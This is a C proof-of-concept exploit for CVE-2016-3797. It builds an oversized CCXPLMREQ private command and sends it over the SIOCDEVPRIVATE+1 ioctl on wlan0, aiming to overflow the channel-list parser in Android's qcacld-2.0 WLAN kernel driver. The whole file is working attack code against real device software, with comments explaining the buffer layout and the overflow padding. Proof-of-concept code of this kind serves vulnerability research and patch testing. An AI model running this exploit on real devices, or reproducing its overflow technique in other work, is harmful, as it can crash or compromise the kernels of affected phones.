/*** CVE-2016-3797.c
 *
 * Proof of concept: sends an oversized "CCXPLMREQ" private command to the
 * qcacld-2.0 WLAN host driver (drivers/staging in the msm kernel tree)
 * through the SIOCDEVPRIVATE+1 ioctl on "wlan0".  The channel list after
 * <number_of_channels> is padded until the whole 8192-byte buffer handed to
 * the driver is used up.
 *
 * Bug report:
 * https://code.google.com/p/android/issues/detail?id=206140
 * Driver-side parser under test:
 * https://android.googlesource.com/kernel/msm.git/+/android-msm-bullhead-3.10-n-preview-1/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_main.c#2836
 *
 * Only meaningful on a device running the affected driver; elsewhere the
 * ioctl simply fails and the program prints the error.
 */
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#include <fcntl.h>
#include <net/if.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/types.h>
#include <unistd.h>
/*
 * For reference, the layout of struct ifreq as declared in <net/if.h>.
 * Only ifr_name and ifr_data are used below: ifr_name selects the
 * interface, ifr_data carries the pointer to our hdd_priv_data_t.
 *
 * struct ifreq {
 *     char ifr_name[IFNAMSIZ];
 *     union {
 *         struct sockaddr ifr_addr;
 *         struct sockaddr ifr_dstaddr;
 *         struct sockaddr ifr_broadaddr;
 *         struct sockaddr ifr_netmask;
 *         struct sockaddr ifr_hwaddr;
 *         short ifr_flags;
 *         int ifr_ifindex;
 *         int ifr_metric;
 *         int ifr_mtu;
 *         struct ifmap ifr_map;
 *         char ifr_slave[IFNAMSIZ];
 *         char ifr_newname[IFNAMSIZ];
 *         char *ifr_data;
 *     };
 * };
 */
/*
 * Userspace copy of the driver's hdd_priv_data_t: the descriptor that
 * main() hands to the driver through ifreq.ifr_data.  Field order and
 * types must match the driver's own definition (see the wlan_hdd_main.c
 * link in the file header) -- verify against the target kernel before
 * relying on it.
 */
typedef struct hdd_priv_data_s
{
char *buf;        /* command string; main() points this at an mmap()ed region */
int used_len;     /* left at 0 by main(); presumably bytes already consumed -- confirm against the driver */
int total_len;    /* length of buf advertised to the driver (8192 in main()) */
}hdd_priv_data_t;
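/*
 * Pad the command buffer with a repeating " 1 2 3 4" channel-number pattern
 * until the 8192-byte budget (PRIV_BUF_LEN, the same value main() reports
 * to the driver as total_len) is exhausted.  The last snprintf() is
 * deliberately allowed to truncate, so the buffer ends up full and still
 * NUL-terminated.
 *
 * data: buffer of at least PRIV_BUF_LEN bytes.
 * used: bytes already occupied at the start of data (the command header
 *       written by the caller).  NULL data or a negative used is rejected:
 *       PRIV_BUF_LEN - used would otherwise be converted to a huge size_t
 *       and snprintf() would write before and past the buffer unbounded.
 */
static void fill_data(char *data, int used) {
    enum { PRIV_BUF_LEN = 8192 };

    if (data == NULL || used < 0) {
        return;
    }

    while (used <= PRIV_BUF_LEN) {
        /*
         * snprintf() returns the length the piece would have had, not the
         * number of bytes stored, so on the final (truncated) write `used`
         * steps past PRIV_BUF_LEN; that is what terminates the loop.
         */
        int n = snprintf(data + used, (size_t)(PRIV_BUF_LEN - used),
                         " %d %d %d %d", 1, 2, 3, 4);
        if (n < 0) {
            return;   /* encoding error: stop instead of moving backwards */
        }
        used += n;
    }
}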
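/*
 * Entry point: build the oversized CCXPLMREQ command and hand it to the
 * driver through the private ioctl on "wlan0".
 *
 * Returns EXIT_FAILURE when the socket or the backing buffer could not be
 * set up, otherwise EXIT_SUCCESS once the ioctl has been attempted.  The
 * ioctl's own outcome is printed but not treated as a program error: on a
 * device without the affected driver it is expected to fail.
 */
int main(void)
{
    enum {
        PRIV_BUF_LEN = 8192,      /* total_len advertised to the driver */
        MAP_LEN      = 4096 * 3,  /* backing mapping, larger than PRIV_BUF_LEN */
    };
    struct ifreq freak = { 0 };
    hdd_priv_data_t priv_data = { 0 };

    /* ifr_name is zero-filled by the initializer, so the 5-byte copy stays NUL-terminated. */
    memcpy(freak.ifr_name, "wlan0", 5);

    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) {
        printf("Failed with %s\n", strerror(errno));
        return EXIT_FAILURE;   /* do not go on to ioctl() an invalid descriptor */
    }
    printf("Got socket # %d\n", fd);

    /* MAP_POPULATE pre-faults the pages; it is Linux-specific, like the target driver. */
    priv_data.total_len = PRIV_BUF_LEN;
    priv_data.buf = mmap(NULL, MAP_LEN, PROT_READ | PROT_WRITE,
                         MAP_ANON | MAP_PRIVATE | MAP_POPULATE, -1, 0);
    if (priv_data.buf == MAP_FAILED) {
        printf("mmap failed with %s\n", strerror(errno));
        close(fd);
        return EXIT_FAILURE;
    }

    /*
     * Command layout expected by the driver's parser (see the header links):
     *   CCXPLMREQ <enable> <dialog_token> <meas_token> <num_of_bursts>
     *   <burst_int> <meas duration> <burst_len> <desired_tx_pwr>
     *   <multcast_addr> <number_of_channels> <channel_numbers...>
     * <number_of_channels> is set to 255; fill_data() then appends channel
     * numbers until the whole PRIV_BUF_LEN budget is consumed.
     */
    int hdr_len = snprintf(priv_data.buf, MAP_LEN,
                           "CCXPLMREQ 1 2 3 4 5 6 7 8 FF FF FF FF FF FF 255 ");
    if (hdr_len < 0 || hdr_len >= MAP_LEN) {
        printf("failed to format command header\n");
        munmap(priv_data.buf, MAP_LEN);
        close(fd);
        return EXIT_FAILURE;
    }
    /* hdr_len is 48 here, the offset the original hard-coded. */
    fill_data(priv_data.buf, hdr_len);

    /*
     * SIOCDEVPRIVATE + 1 is the driver-private command the linked handler
     * dispatches on -- confirm against the target kernel's wlan_hdd_main.c.
     */
    freak.ifr_data = (void *)&priv_data;
    int ret = ioctl(fd, SIOCDEVPRIVATE + 1, &freak);
    int saved_errno = errno;   /* printf() below may clobber errno */
    if (ret < 0) {
        printf("ret is %s\n", strerror(saved_errno));
    } else {
        printf("ret is %d (ioctl succeeded)\n", ret);
    }

    munmap(priv_data.buf, MAP_LEN);
    close(fd);
    return EXIT_SUCCESS;
}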